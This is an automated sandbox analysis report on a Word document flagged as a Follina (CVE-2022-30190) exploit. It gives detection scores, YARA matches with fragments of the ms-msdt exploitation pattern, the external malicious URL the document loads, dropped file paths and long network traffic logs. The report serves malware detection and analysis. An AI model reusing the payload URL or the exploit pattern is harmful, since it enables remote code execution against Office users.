Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
qoIZSkdejM

Overview

General Information

Sample Name:qoIZSkdejM (renamed file extension from none to docx)
Analysis ID:686090
MD5:0d37337ead8492e1b2395f6cd4f724fc
SHA1:a66ff1064025c026f2d88b87796009ba34c1bee8
SHA256:cd3132beed7d712a890f83dc302765bfa232e5b059a6fa7b4ee5355f11b55368
Tags:docx
Infos:

Detection

Follina CVE-2022-30190
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Antivirus detection for dropped file
Contains an external reference to another file
Detected suspicious Microsoft Office reference URL
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2536 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
document.xml.relsSUSP_Doc_WordXMLRels_May22Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard, Wojciech Cieslak
  • 0x38:$a1: <Relationships
  • 0x2b5:$a2: TargetMode="External"
  • 0x2ad:$x1: .html!
document.xml.relsINDICATOR_OLE_RemoteTemplateDetects XML relations where an OLE object is refrencing an external target in dropper OOXML documentsditekSHen
  • 0x26d:$olerel: relationships/oleObject
  • 0x286:$target1: Target="http
  • 0x2b5:$mode: TargetMode="External

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitationNasreddine Bencherchali, Christian Burkard
  • 0x37a7:$a: PCWDiagnostic
  • 0x379b:$sa3: ms-msdt
  • 0x381a:$sb3: IT_BrowseForFile=
sslproxydump.pcapEXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard
  • 0x378a:$re1: location.href = "ms-msdt:
sslproxydump.pcapJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\456[1].htmSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitationNasreddine Bencherchali, Christian Burkard
    • 0x198c:$a: PCWDiagnostic
    • 0x1980:$sa3: ms-msdt
    • 0x19ff:$sb3: IT_BrowseForFile=
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\456[1].htmEXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard
    • 0x196f:$re1: location.href = "ms-msdt:
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\456[1].htmJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8EBCBBE8.htmSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitationNasreddine Bencherchali, Christian Burkard
      • 0x198c:$a: PCWDiagnostic
      • 0x1980:$sa3: ms-msdt
      • 0x19ff:$sb3: IT_BrowseForFile=
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8EBCBBE8.htmEXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard
      • 0x196f:$re1: location.href = "ms-msdt:
      Click to see the 4 entries

      Sigma Signatures

      No Sigma rule has matched

      Snort Signatures

      No Snort rule has matched

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: qoIZSkdejM.docxAvira: detected
      Multi AV Scanner detection for submitted file
      Source: qoIZSkdejM.docxVirustotal: Detection: 35%Perma Link
      Source: qoIZSkdejM.docxMetadefender: Detection: 22%Perma Link
      Source: qoIZSkdejM.docxReversingLabs: Detection: 44%
      Antivirus detection for URL or domain
      Source: https://www.malwarejake.com/456.htmlAvira URL Cloud: Label: malware
      Antivirus detection for dropped file
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\456[1].htmAvira: detection malicious, Label: JS/CVE-2022-30190.G
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8EBCBBE8.htmAvira: detection malicious, Label: JS/CVE-2022-30190.G
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F8D236.htmAvira: detection malicious, Label: JS/CVE-2022-30190.G

      Exploits

      barindex
      Yara detected Microsoft Office Exploit Follina CVE-2022-30190
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\456[1].htm, type: DROPPED
      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8EBCBBE8.htm, type: DROPPED
      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F8D236.htm, type: DROPPED
      Detected suspicious Microsoft Office reference URL
      Source: document.xml.relsExtracted files from sample: https://www.malwarejake.com/456.html!
      Source: unknownHTTPS traffic detected: 143.198.109.79:443 -> 192.168.2.22:49179 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 143.198.109.79:443 -> 192.168.2.22:49180 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 143.198.109.79:443 -> 192.168.2.22:49181 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 143.198.109.79:443 -> 192.168.2.22:49182 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 143.198.109.79:443 -> 192.168.2.22:49186 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 143.198.109.79:443 -> 192.168.2.22:49187 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 143.198.109.79:443 -> 192.168.2.22:49188 version: TLS 1.0
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: unknownHTTPS traffic detected: 143.198.109.79:443 -> 192.168.2.22:49178 version: TLS 1.2
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49178
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49178
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49178
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49178
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49178
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49178
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49178
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49178
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49178
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49179
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49179
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49179
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49179
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49179
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49179
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49179
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49179
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49179
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49179
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49180
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49180
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49180
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49180
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49180
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49180
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49180
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49180
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49180
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49182
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49182
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49182
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49182
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49182
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49182
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49182
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49182
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49182
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49183
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49183
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49183
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49183
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49183
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49183
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49183
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49183
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49183
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49184
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49184
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49184
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49184
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49184
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49184
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49184
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49184
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49184 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49185
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49185
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49185
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49185
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49185
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49185
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49185
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49185
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49185 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49186
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49186
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49186
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49186
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49186
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49186
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49186
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49186
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49186
      Source: global trafficTCP traffic: 192.168.2.22:49186 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49186
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49187
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49187
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49187
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49187
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49187
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49187
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49187
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49187
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49187 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49187
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49188
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49188
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49188
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49188
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49188
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49188
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49188
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49188
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49188 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49188
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49189
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49189
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49189
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49189
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49189
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49189
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49189
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49189 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49190
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49190 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49191 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49191
      Source: global trafficTCP traffic: 192.168.2.22:49191 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49191 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49191
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49191
      Source: global trafficTCP traffic: 192.168.2.22:49191 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49191 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49191
      Source: global trafficTCP traffic: 192.168.2.22:49191 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49191
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49191
      Source: global trafficTCP traffic: 192.168.2.22:49191 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49191 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49191
      Source: global trafficTCP traffic: 143.198.109.79:443 -> 192.168.2.22:49191
      Source: global trafficTCP traffic: 192.168.2.22:49191 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49191 -> 143.198.109.79:443
      Source: global trafficDNS query: name: www.malwarejake.com
      Source: global trafficDNS query: name: www.malwarejake.com
      Source: global trafficDNS query: name: www.malwarejake.com
      Source: global trafficDNS query: name: www.malwarejake.com
      Source: global trafficDNS query: name: www.malwarejake.com
      Source: global trafficDNS query: name: www.malwarejake.com
      Source: global trafficDNS query: name: www.malwarejake.com
      Source: global trafficDNS query: name: www.malwarejake.com
      Source: global trafficDNS query: name: www.malwarejake.com
      Source: global trafficDNS query: name: www.malwarejake.com
      Source: global trafficDNS query: name: www.malwarejake.com
      Source: global trafficDNS query: name: www.malwarejake.com
      Source: global trafficDNS query: name: www.malwarejake.com
      Source: global trafficDNS query: name: www.malwarejake.com
      Source: global trafficDNS query: name: www.malwarejake.com
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 143.198.109.79:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 143.198.109.79:443
